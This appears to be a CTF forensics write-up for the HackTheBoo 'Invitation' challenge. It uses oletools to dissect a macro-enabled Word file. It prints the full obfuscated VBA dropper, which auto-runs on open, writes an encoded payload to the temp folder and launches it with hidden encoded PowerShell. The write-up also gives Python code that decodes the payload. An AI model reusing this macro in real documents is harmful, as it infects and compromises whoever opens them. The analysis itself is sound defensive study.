It was the Diwali holidays, and I came across the HackTheBox CTF HackTheBoo, where almost all of the challenges were simple; I did 11/25 challenges. The challenges I loved were from the forensics and web categories. They kinda made the pwn challenges cringy (like you would find in any other CTF), and I don't know much about crypto, so I didn't even touch that category. In this article, I am going to solve two forensic challenges and explain the topics you are supposed to know to solve them.

Invitation

In this challenge we are given a single file, `invitation.docm`. We know it is a forensic challenge, and the file type alone (`docm`, a macro-enabled Word document) tells us where to look:

10:47:50 root@kali forensics_invitation → file invitation.docm 
invitation.docm: Microsoft Word 2007+

That tells us enough: a `.docm` is a macro-enabled document, so there is almost certainly a VBA macro embedded in it that we need to extract. I didn't even open the file to view it; I went straight to the terminal and started analysing it. The toolkit you need here is `oletools`. Install it with pip:

pip install oletools

We will run `oleid` on the given file for a quick triage summary:

11:31:24 root@kali forensics_invitation → oleid ./invitation.docm 
oleid 0.60.1 - http://decalage.info/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

Filename: ./invitation.docm
WARNING  For now, VBA stomping cannot be detected for files in memory
--------------------+--------------------+----------+--------------------------
Indicator           |Value               |Risk      |Description               
--------------------+--------------------+----------+--------------------------
File format         |MS Word 2007+ Macro-|info      |                          
                    |Enabled Document    |          |                          
                    |(.docm)             |          |                          
--------------------+--------------------+----------+--------------------------
Container format    |OpenXML             |info      |Container type            
--------------------+--------------------+----------+--------------------------
Encrypted           |False               |none      |The file is not encrypted 
--------------------+--------------------+----------+--------------------------
VBA Macros          |Yes, suspicious     |HIGH      |This file contains VBA    
                    |                    |          |macros. Suspicious        
                    |                    |          |keywords were found. Use  
                    |                    |          |olevba and mraptor for    
                    |                    |          |more info.                
--------------------+--------------------+----------+--------------------------
XLM Macros          |No                  |none      |This file does not contain
                    |                    |          |Excel 4/XLM macros.       
--------------------+--------------------+----------+--------------------------
External            |1                   |HIGH      |External relationships    
Relationships       |                    |          |found: attachedTemplate - 
                    |                    |          |use oleobj for details    
--------------------+--------------------+----------+--------------------------

Two indicators are flagged HIGH (shown in red in your terminal): External Relationships and VBA Macros. The external relationship can be inspected with `oleobj`.

11:31:36 root@kali forensics_invitation → oleobj ./invitation.docm 
oleobj 0.60.1 - http://decalage.info/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

-------------------------------------------------------------------------------
File: './invitation.docm'
Found relationship 'attachedTemplate' with external link file:///C:\Users\0xp374\Downloads\tf78063791_win32.dotx

This one is of no use to us. An `attachedTemplate` relationship is still worth checking every time, because pointing it at a remote URL is a well-known way to pull a macro-enabled template into a document at open time; here, however, it points at a local path on the author's own machine, and a `.dotx` is the macro-free template format anyway (the macro-enabled one is `.dotm`), so it is a dead end.

Moving on to the VBA Macros row, which says "suspicious" with risk HIGH. `olevba` extracts the macro source and flags suspicious keywords:

11:32:27 root@kali forensics_invitation → olevba ./invitation.docm
olevba 0.60.1 on Python 3.10.5 - http://decalage.info/python/oletools
===============================================================================
FILE: ./invitation.docm
Type: OpenXML
WARNING  For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub AutoOpen()
odhsjwpphlxnb
Call lmavedb
End Sub
Private Sub odhsjwpphlxnb()
Dim bnhupraoau As String
CreateObject("WScript.Shell").currentdirectory = Environ("TEMP")
bnhupraoau = sryivxjsdncj()
dropPath = Environ("TEMP")
...

It gives a really long output. `olevba` has a `--reveal` flag that prints the macro source with the obfuscated string literals replaced by their decoded values (`--decode` lists the decoded strings on their own). We are interested in `VBA MACRO ThisDocument.cls`, since it contains long runs of space-separated decimal character codes:

Sub AutoOpen()
odhsjwpphlxnb
Call lmavedb
End Sub
Private Sub odhsjwpphlxnb()
Dim bnhupraoau As String
CreateObject("WScript.Shell").currentdirectory = "%TEMP%"
bnhupraoau = sryivxjsdncj()
dropPath = "%TEMP%"
Set rxnnvnfqufrzqfhnff = CreateObject("b'Scripti'b'ng.FileSystemObject'")
Set dfdjqgaqhvxxi = rxnnvnfqufrzqfhnff.CreateTextFile(dropPath & "b'\\hist'b'ory.bak'", True)
dfdjqgaqhvxxi.Write bnhupraoau
dfdjqgaqhvxxi.Close
End Sub
Private Function wdysllqkgsbzs(strBytes) As String
Dim aNumbers
Dim fxnrfzsdxmcvranp As String
Dim iIter
fxnrfzsdxmcvranp = ""
aNumbers = Split(strBytes)
For iIter = LBound(aNumbers) To UBound(aNumbers)
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + Chr(aNumbers(iIter))
Next
wdysllqkgsbzs = fxnrfzsdxmcvranp
End Function
Private Function okbzichkqtto() As String
Dim fxnrfzsdxmcvranp As String
fxnrfzsdxmcvranp = ""
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'74 65 66 122 65 68 48 65 74 1'b'19 65 51 65 68 99 65 76 103 65 51 65 68 81 65 76 103'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 120 65 68 10'b'7 65 79 65 65 117 65 68 85 65 77 103 65 54 65 68 103 65 77 65 65 52'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 68 65 65 74'b' 119 65 55 65 67 81 65 97 81 65 57 65 67 99 65 90 65 65 48 65 68 77'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 89 103 66 106 65 71 77 65 78 103 66 107 65 6'b'7 48 65 77 65 65 48 65 68 77 65 90'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'103 65 121 65 68 81 65 77 65 65 5'b'3 65 67 48 65 78 119 66 108 65 71 69 65 77 103 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'122 65 71 69 65 77 103 66 106 65 67 99 65 79 119 65 107 65 72 65 65 80 81 65 1'b'10 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'71 103 65 100 65 66 48 65 72 65 65 79 103 'b'65 118 65 67 56 65 74 119 65 55 65 67 81'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 100 103 65 57 65 69 107 65 98 103 66 50 65 71 56 65 97 119 66 108 65 67 4'b'8 65 85'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'103 66 108 65 72 77 65 100 65 66 78 65 71 85 65 100 65 66 111 65 71 56 65 90'b' 65 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'103 65 67 48 65 86 81 66 122 65 71 8'b'5 65 81 103 66 104 65 72 77 65 97 81 66 106 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'70 65 65 89 81 66 121 65 72 77 65 97 81 66'b' 117 65 71 99 65 73 65 65 116 65 70 85 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'99 103 66 112 65 67 65 65 74 65 66 119 65 67 81 65 99 119 65 118 'b'65 71 81 65 78 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 122 65 71 73 65'b' 89 119 66 106 65 68 89 65 90 65 65 103 65 67 48 65 83 65 66 108'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 71 69 65 90 65 66 108 65 72 73 65 99 119 65'b' 103 65 69 65 65 101 119 65 105 65 69'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'69 65 100 81 66 48 65 71 103 65 9'b'8 119 66 121 65 71 107 65 101 103 66 104 65 72 81'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 97 81 66 'b'118 65 71 52 65 73 103 65 57 65 67 81 65 97 81 66 57 65 68 115 65 100'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'119 66 111 65 71 107 65 98 65 66 108'b' 65 67 65 65 75 65 65 107 65 72 81 65 99 103 66'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'49 65 71 85 65 75 81 66 55 65 67 81 65 89 119 65 57 65 67 103 65 83 81 66 11'b'7 65 72'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'89 65 98 119 66 114 65 71 85 65 76 81 66 83'b' 65 71 85 65 99 119 66 48 65 69 48 65 90'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'81 66 48 65 71 103 65 98 119 66 107 65 67 65 65 76 81 66 86 65 72 7'b'7 65 90 81 66 67'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 71 69 65 99 119 66 112 65 71 77 65 85 65 66 104 65 'b'72 73 65 99 119 66 112 65 71'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'52 65 90 119 65 103 65 67 48 65 86 81 66 121 65 71 107 65 73 65 65 107 65 72 65'b' 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'74 65 66 122 65 67 'b'56 65 77 65 65 48 65 68 77 65 90 103 65 121 65 68 81 65 77 65 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'53 65 67 65 65 76 81 66 73 65 71 85 65 89 81 66 107 65'b' 71 85 65 99 103 66 122 65 67'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 65 81 65 66 55 65 67 73 65 8'b'1 81 66 49 65 72 81 65 97 65 66 118 65 72 73 65 97'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'81 66 54 65 71 69 65 'b'100 65 66 112 65 71 56 65 98 103 65 105 65 68 48 65 74 65 66'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'112 65 72 48 65 'b'75 81 65 55 65 71 107 65 90 103 65 103 65 67 103 65 74 65 66 106 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'67'b' 65 65 76 81 66 117 65 71 85 65 73 65 65 110 65 69 52 65 98 119 66 117 65 71 85'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 74 119 65 112 65 67 65 65 101 119 65 107 65 72 73 65 80 81 66 112 65 'b'71 85 65 101'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 65 103 'b'65 67 81 65 89 119 65 103 65 67 48 65 82 81 66 121 65 72 73 65 98 119 66'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'121 65 69 69 65 89 119 66 48 65 71 107 65 98 119 66 117 65 'b'67 65 65 85 119 66 48 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'71 56 65 99 65 65 103 65 67 48 65 82 81 66 121 'b'65 72 73 65 98 119 66 121 65 70 89'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 89 81 66 121 65 71 107 65 89 8'b'1 66 105 65 71 119 65 90 81 65 103 65 71 85 65 79'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'119 65 107 65 72 73 65 80 81 'b'66 80 65 72 85 65 100 65 65 116 65 70 77 65 100 65 66'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'121 65 7'b'1 107 65 98 103 66 110 65 67 65 65 76 81 66 74 65 71 52 65 99 65 66 49 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'72 81 65 84 119 66 105 65 71 111 65 90 81 66 106 65 72 81 65 73 65 65 107 65 72'b' 73'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 79 119 65 107 65 72 81 65 80 81 66 'b'74 65 71 52 65 100 103 66 118 65 71 115 65 90'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'81 65 116 65 70 73 65 90 81 66 122 65 72 81 65 84 81 66 10'b'8 65 72 81 65 97 65 66 118'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 71 81 65 73'b' 65 65 116 65 70 85 65 99 103 66 112 65 67 65 65 74 65 66 119 65 67'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'81 65 99 119 65 118 65 68 99 65 90 81 66 104 65 68 73 65 77 119 66 104 65 68 73 'b'65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'89 119 65 103 65 67 48 65 84 81 66 108 65 72 81 65 97 65 66 118 65 71 'b'81 65 73 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'66 81 'b'65 69 56 65 85 119 66 85 65 67 65 65 76 81 66 73 65 71 85 65 89 81 66 107 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'71 85 65 99 103 66 122 65 67 65 65 81 65 66 55'b' 65 67 73 65 81 81 66 49 65 72 81 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'97 65 66 118 65 72 73 65 97 81 66 54 65 71 69 65 100 65 66 112 65 71 56 65 98'b' 103'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 105 65 68 48 65 74 65 66 112 65 72 48 65 73 65 65 'b'116 65 69 73 65 98 119 66 107'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 72 'b'107 65 73 65 65 111 65 70 115 65 85 119 66 53 65 72 77 65 100 65 66 108 65 71'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'48 65'b' 76 103 66 85 65 71 85 65 101 65 66 48 65 67 52 65 82 81 66 117 65 71 77 65 98'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'119 66 107 65 71 107 65 98 103 66 110 65 70 48 65 79 103 65 54 65 70 85 65'b' 86 65 66'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'71 65 68 103 65 76 103 66 72 65 71'b' 85 65 100 65 66 67 65 72 107 65 100 65 66 108 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'72 77 65 75 65 65 107 65 71 85 65 75 119 65 107 65 72 73 65 75 81 65'b' 103 65 67 48'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 97 103 66 'b'118 65 71 107 65 98 103 65 103 65 67 99 65 73 65 65 110 65 67 107 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'102'b' 81 65 103 65 72 77 65 98 65 66 108 65 71 85 65 99 65 65 103 65 68 65 65 76 103'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 52 65 72 48 65 83 65 66 'b'85 65 69 73 65 101 119 65 49 65 72 85 65 99 65 65 122 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'72 73 65 88 119 65 122 65 68 81 65 78 8'b'1 66 53 65 70 56 65 98 81 65 48 65 71 77 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'99 103 65 119 65 68 85 65 102 81 'b'65 61'")
okbzichkqtto = fxnrfzsdxmcvranp
End Function
Private Function sryivxjsdncj() As String
Dim fxnrfzsdxmcvranp As String
fxnrfzsdxmcvranp = ""
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + okbzichkqtto()
sryivxjsdncj = fxnrfzsdxmcvranp
End Function
Sub lmavedb()
dropPath = "%TEMP%"
Set rxnnvnfqufrzqfhnff = CreateObject("b'Scripting.FileSyst'b'emObject'")
Set ktmlmpc = rxnnvnfqufrzqfhnff.OpenTextFile(dropPath & "b'\\h'b'istory.bak'")
secret = ktmlmpc.ReadAll
ktmlmpc.Close
Code = "powershell -WindowStyle hidden -e """ & secret
x = Shell(Code, 1)
End Sub

In the listing above you can see it wants to say `history.bak`, but instead prints `b'\\h'b'istory.bak'`. The `b'...'` wrappers are Python bytes-literal representations leaking through from olevba's string decoding (the `--reveal` output is still marked experimental); one shows up for every obfuscated fragment that olevba substituted, which is why a single logical string, and even a single number inside it, can come out split across several fragments. You still get the idea of what each string is and is not. Reading the macro as a whole: `AutoOpen` first calls `odhsjwpphlxnb`, which builds a long string via `sryivxjsdncj` and `okbzichkqtto` and writes it to `%TEMP%\history.bak`; it then calls `lmavedb`, which reads that file back and runs `powershell -WindowStyle hidden -e <contents>`. So whatever `okbzichkqtto` builds is a base64-encoded PowerShell command, and decoding it is the whole challenge.

We can see that in the function `okbzichkqtto`, strings of space-separated decimal character codes are passed to a function called `wdysllqkgsbzs`:

Private Function wdysllqkgsbzs(strBytes) As String
Dim aNumbers
Dim fxnrfzsdxmcvranp As String
Dim iIter
fxnrfzsdxmcvranp = ""
aNumbers = Split(strBytes)
For iIter = LBound(aNumbers) To UBound(aNumbers)
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + Chr(aNumbers(iIter))
Next
wdysllqkgsbzs = fxnrfzsdxmcvranp
End Function

Reading it, the function splits the string on spaces, iterates over each decimal value, converts it to the character with that code (`Chr`), and returns the concatenation. We can do the same thing in Python, with the `b'...'` debris stripped out of the strings by hand:

def wdysllqkgsbzs(string):
    r = ''
    for s in string.split():
        r+=chr(int(s))
    return r


fxnrfzsdxmcvranp = ""
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("74 65 66 122 65 68 48 65 74 119 65 51 65 68 99 65 76 103 65 51 65 68 81 65 76 103")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 120 65 68 107 65 79 65 65 117 65 68 85 65 77 103 65 54 65 68 103 65 77 65 65 52")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 68 65 65 74 119 65 55 65 67 81 65 97 81 65 57 65 67 99 65 90 65 65 48 65 68 77")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 89 103 66 106 65 71 77 65 78 103 66 107 65 67 48 65 77 65 65 48 65 68 77 65 90")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("103 65 121 65 68 81 65 77 65 65 53 65 67 48 65 78 119 66 108 65 71 69 65 77 103 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("122 65 71 69 65 77 103 66 106 65 67 99 65 79 119 65 107 65 72 65 65 80 81 65 110 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("71 103 65 100 65 66 48 65 72 65 65 79 103 65 118 65 67 56 65 74 119 65 55 65 67 81")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 100 103 65 57 65 69 107 65 98 103 66 50 65 71 56 65 97 119 66 108 65 67 48 65 85")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("103 66 108 65 72 77 65 100 65 66 78 65 71 85 65 100 65 66 111 65 71 56 65 90 65 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("103 65 67 48 65 86 81 66 122 65 71 85 65 81 103 66 104 65 72 77 65 97 81 66 106 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("70 65 65 89 81 66 121 65 72 77 65 97 81 66 117 65 71 99 65 73 65 65 116 65 70 85 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("99 103 66 112 65 67 65 65 74 65 66 119 65 67 81 65 99 119 65 118 65 71 81 65 78 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 122 65 71 73 65 89 119 66 106 65 68 89 65 90 65 65 103 65 67 48 65 83 65 66 108")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 71 69 65 90 65 66 108 65 72 73 65 99 119 65 103 65 69 65 65 101 119 65 105 65 69")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("69 65 100 81 66 48 65 71 103 65 98 119 66 121 65 71 107 65 101 103 66 104 65 72 81")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 97 81 66 118 65 71 52 65 73 103 65 57 65 67 81 65 97 81 66 57 65 68 115 65 100")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("119 66 111 65 71 107 65 98 65 66 108 65 67 65 65 75 65 65 107 65 72 81 65 99 103 66")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("49 65 71 85 65 75 81 66 55 65 67 81 65 89 119 65 57 65 67 103 65 83 81 66 117 65 72")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("89 65 98 119 66 114 65 71 85 65 76 81 66 83 65 71 85 65 99 119 66 48 65 69 48 65 90")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("81 66 48 65 71 103 65 98 119 66 107 65 67 65 65 76 81 66 86 65 72 77 65 90 81 66 67")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 71 69 65 99 119 66 112 65 71 77 65 85 65 66 104 65 72 73 65 99 119 66 112 65 71")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("52 65 90 119 65 103 65 67 48 65 86 81 66 121 65 71 107 65 73 65 65 107 65 72 65 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("74 65 66 122 65 67 56 65 77 65 65 48 65 68 77 65 90 103 65 121 65 68 81 65 77 65 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("53 65 67 65 65 76 81 66 73 65 71 85 65 89 81 66 107 65 71 85 65 99 103 66 122 65 67")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 65 81 65 66 55 65 67 73 65 81 81 66 49 65 72 81 65 97 65 66 118 65 72 73 65 97")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("81 66 54 65 71 69 65 100 65 66 112 65 71 56 65 98 103 65 105 65 68 48 65 74 65 66")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("112 65 72 48 65 75 81 65 55 65 71 107 65 90 103 65 103 65 67 103 65 74 65 66 106 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("67 65 65 76 81 66 117 65 71 85 65 73 65 65 110 65 69 52 65 98 119 66 117 65 71 85")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 74 119 65 112 65 67 65 65 101 119 65 107 65 72 73 65 80 81 66 112 65 71 85 65 101")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 65 103 65 67 81 65 89 119 65 103 65 67 48 65 82 81 66 121 65 72 73 65 98 119 66")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("121 65 69 69 65 89 119 66 48 65 71 107 65 98 119 66 117 65 67 65 65 85 119 66 48 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("71 56 65 99 65 65 103 65 67 48 65 82 81 66 121 65 72 73 65 98 119 66 121 65 70 89")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 89 81 66 121 65 71 107 65 89 81 66 105 65 71 119 65 90 81 65 103 65 71 85 65 79")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("119 65 107 65 72 73 65 80 81 66 80 65 72 85 65 100 65 65 116 65 70 77 65 100 65 66")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("121 65 71 107 65 98 103 66 110 65 67 65 65 76 81 66 74 65 71 52 65 99 65 66 49 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("72 81 65 84 119 66 105 65 71 111 65 90 81 66 106 65 72 81 65 73 65 65 107 65 72 73")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 79 119 65 107 65 72 81 65 80 81 66 74 65 71 52 65 100 103 66 118 65 71 115 65 90")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("81 65 116 65 70 73 65 90 81 66 122 65 72 81 65 84 81 66 108 65 72 81 65 97 65 66 118")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 71 81 65 73 65 65 116 65 70 85 65 99 103 66 112 65 67 65 65 74 65 66 119 65 67")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("81 65 99 119 65 118 65 68 99 65 90 81 66 104 65 68 73 65 77 119 66 104 65 68 73 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("89 119 65 103 65 67 48 65 84 81 66 108 65 72 81 65 97 65 66 118 65 71 81 65 73 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("66 81 65 69 56 65 85 119 66 85 65 67 65 65 76 81 66 73 65 71 85 65 89 81 66 107 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("71 85 65 99 103 66 122 65 67 65 65 81 65 66 55 65 67 73 65 81 81 66 49 65 72 81 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("97 65 66 118 65 72 73 65 97 81 66 54 65 71 69 65 100 65 66 112 65 71 56 65 98 103")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 105 65 68 48 65 74 65 66 112 65 72 48 65 73 65 65 116 65 69 73 65 98 119 66 107")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 72 107 65 73 65 65 111 65 70 115 65 85 119 66 53 65 72 77 65 100 65 66 108 65 71")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("48 65 76 103 66 85 65 71 85 65 101 65 66 48 65 67 52 65 82 81 66 117 65 71 77 65 98")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("119 66 107 65 71 107 65 98 103 66 110 65 70 48 65 79 103 65 54 65 70 85 65 86 65 66")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("71 65 68 103 65 76 103 66 72 65 71 85 65 100 65 66 67 65 72 107 65 100 65 66 108 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("72 77 65 75 65 65 107 65 71 85 65 75 119 65 107 65 72 73 65 75 81 65 103 65 67 48")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 97 103 66 118 65 71 107 65 98 103 65 103 65 67 99 65 73 65 65 110 65 67 107 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("102 81 65 103 65 72 77 65 98 65 66 108 65 71 85 65 99 65 65 103 65 68 65 65 76 103")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 52 65 72 48 65 83 65 66 85 65 69 73 65 101 119 65 49 65 72 85 65 99 65 65 122 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("72 73 65 88 119 65 122 65 68 81 65 78 81 66 53 65 70 56 65 98 81 65 48 65 71 77 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("99 103 65 119 65 68 85 65 102 81 65 61")
print(fxnrfzsdxmcvranp)

This prints a base64-encoded string: the contents of `history.bak`, i.e. the argument the macro hands to `powershell -e`.


`powershell -e` (`-EncodedCommand`) expects base64 of a UTF-16LE string, so after base64-decoding it we get a UTF-16LE-encoded (Windows, duh) PowerShell script, which contains the flag.
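To close the loop on the whole chain in one place, here is an added example (my code, not the writeup's and not from the challenge) that ports `wdysllqkgsbzs`, joins the chunks, base64-decodes the result and decodes it as UTF-16LE, exactly the way `powershell -e` would. The payload it round-trips is a constructed stand-in, not the real blob; the only real data it touches is the first chunk from the listing above, which on its own is too short to decode fully and is therefore only previewed.

```python
import base64

# Added example (not the writeup's code): the full decode chain for the
# Invitation macro. wdysllqkgsbzs() turns space-separated decimal character
# codes into a string, the pieces are concatenated into base64, and
# `powershell -e` decodes that base64 as a UTF-16LE string.


def vba_chr_join(codes: str) -> str:
    """Python port of wdysllqkgsbzs(): Split() on whitespace, Chr() each number."""
    return "".join(chr(int(c)) for c in codes.split())


def decode_encoded_command(b64: str) -> str:
    """Reverse `powershell -EncodedCommand`: base64 -> UTF-16LE bytes -> text."""
    return base64.b64decode(b64).decode("utf-16-le")


def recover_script(chunks: list[str]) -> str:
    """Replay okbzichkqtto(): decode every chunk, join them, then undo -e."""
    return decode_encoded_command("".join(vba_chr_join(c) for c in chunks))


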